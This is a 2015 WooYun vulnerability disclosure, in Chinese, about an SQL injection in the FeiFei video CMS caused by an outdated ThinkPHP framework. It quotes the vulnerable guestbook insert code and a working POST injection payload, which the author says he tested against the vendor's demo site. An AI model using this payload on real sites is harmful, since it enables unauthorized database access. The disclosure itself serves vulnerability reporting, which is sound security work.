当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096566

漏洞标题:飞飞影视最新版sql注入

相关厂商:飞飞影视

漏洞作者: %270x5c

提交时间:2015-02-12 15:39

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入

详细说明:

下源码下来看了下,他的thinkphp框架还没更新,
WooYun: ThinkPHP框架架构上存在SQL注入 以前有报过漏洞。
Lib/Lib/Action/Home/GbAction.class.php

public function insert(){
$rs = D("Gb");
C('TOKEN_ON',false);//关闭令牌验证
if($rs->create()){
if (false !== $rs->add()) {
$cookie = 'gbook-'.intval($_POST['gb_cid']);
setcookie($cookie, 'true', time()+intval(C('user_second')));
if (C('user_check')) {
$this->success('留言成功,我们会尽快审核您的留言!');
}else{
$this->success('恭喜您,留言成功!');
}
}else{
$this->error('留言失败,请重试!');
}
}else{
$this->error($rs->getError());
}
}

这个文件正好满足这个注入。
WooYun: 飞飞影视最新版前台无限制getshell 看到前辈说www.ding1234.com是他的demo,
就拿官方demo测试下。
post数据

gb_cid[]=exp&gb_cid[]=0,version(),1,0,0,1)%23&gb_content=1&gb_code=5297


1.png


漏洞证明:

1.png


修复方案:

升级thinkphp哦

版权声明:转载请注明来源 %270x5c@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝